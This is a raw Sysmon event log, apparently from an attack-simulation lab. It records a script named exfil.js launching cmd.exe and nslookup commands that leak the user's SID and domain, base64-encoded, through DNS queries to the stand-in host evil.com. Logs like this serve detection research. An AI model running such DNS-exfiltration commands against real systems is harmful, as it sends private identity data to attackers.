14:16:16.590{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196557Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.590{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196556Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.590{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B0-629A-C93E-000000005F02}7372C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196555Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.590{2E1864BB-17A1-629A-783D-000000005F02}55527964C:\Windows\System32\WScript.exe{2E1864BB-17B0-629A-C93E-000000005F02}7372C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000196554Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.593{2E1864BB-17B0-629A-C93E-000000005F02}7372C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAz evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlqqvt.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 22542200x8000000000000000196553Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.202{00000000-0000-0000-0000-000000000000}8012evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000196552Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.109{00000000-0000-0000-0000-000000000000}4284evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000196551Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.047{00000000-0000-0000-0000-000000000000}684evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000196550Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.930{00000000-0000-0000-0000-000000000000}7220evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000196549Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.749{00000000-0000-0000-0000-000000000000}7508evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000196548Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.615{00000000-0000-0000-0000-000000000000}3396evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000196547Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.450{00000000-0000-0000-0000-000000000000}8072evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000196546Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.330{00000000-0000-0000-0000-000000000000}2900evil.com0::ffff:127.0.0.1;<unknown process> 23542300x8000000000000000196545Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.574{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlxvkj.tmpMD5=FB20CB6722435F1F35A02C74A813F0C5,SHA256=8013914F02524B11209965048D9BE8D67580A0B87255186F58E48D3DD646BD34,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000196544Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.527{2E1864BB-17B0-629A-C73E-000000005F02}42124484C:\Windows\system32\conhost.exe{2E1864BB-17B0-629A-C83E-000000005F02}6508C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196543Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.527{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196542Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.527{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196541Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.527{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196540Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.527{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196539Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.527{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B0-629A-C83E-000000005F02}6508C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196538Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.527{2E1864BB-17B0-629A-C63E-000000005F02}52323968C:\Windows\system32\cmd.exe{2E1864BB-17B0-629A-C83E-000000005F02}6508C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000196537Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.536{2E1864BB-17B0-629A-C83E-000000005F02}6508C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17B0-629A-C63E-000000005F02}5232C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlxvkj.tmp 2>&1 10341000x8000000000000000196536Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.505{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17B0-629A-C73E-000000005F02}4212C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196535Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.490{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17B0-629A-C73E-000000005F02}4212C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196534Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.490{2E1864BB-17B0-629A-C73E-000000005F02}42124484C:\Windows\system32\conhost.exe{2E1864BB-17B0-629A-C63E-000000005F02}5232C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196533Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.474{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B0-629A-C73E-000000005F02}4212C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196532Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.458{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196531Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.458{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196530Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.458{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196529Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.458{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196528Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.458{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B0-629A-C63E-000000005F02}5232C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196527Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.458{2E1864BB-17A1-629A-783D-000000005F02}55527416C:\Windows\System32\WScript.exe{2E1864BB-17B0-629A-C63E-000000005F02}5232C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000196526Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.457{2E1864BB-17B0-629A-C63E-000000005F02}5232C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlxvkj.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000196525Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.442{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nldcgrhjx.tmpMD5=0E5FCD35CD053EF552028604630DF807,SHA256=10CB74BA0B52EDCD250F65D3C712B6E8DE326D18DDB63A8E97ADD31848C9E0E2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000196524Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.933{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52339- 354300x8000000000000000196523Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.752{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52338- 354300x8000000000000000196522Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.751{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52337- 23542300x8000000000000000196521Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.390{2E1864BB-FA4D-6299-5F07-000000005F02}6532ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\or89gb4t.default-release\datareporting\glean\db\data.safe.binMD5=A018F89A768617A02044ECAD2B8C92A7,SHA256=B3368376091EFE7DFD6898BBF7011AAE0E98649160469AB4DCF644B2EBA089A8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000196520Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.374{2E1864BB-17B0-629A-C43E-000000005F02}76326824C:\Windows\system32\conhost.exe{2E1864BB-17B0-629A-C53E-000000005F02}5436C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196519Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.374{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196518Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 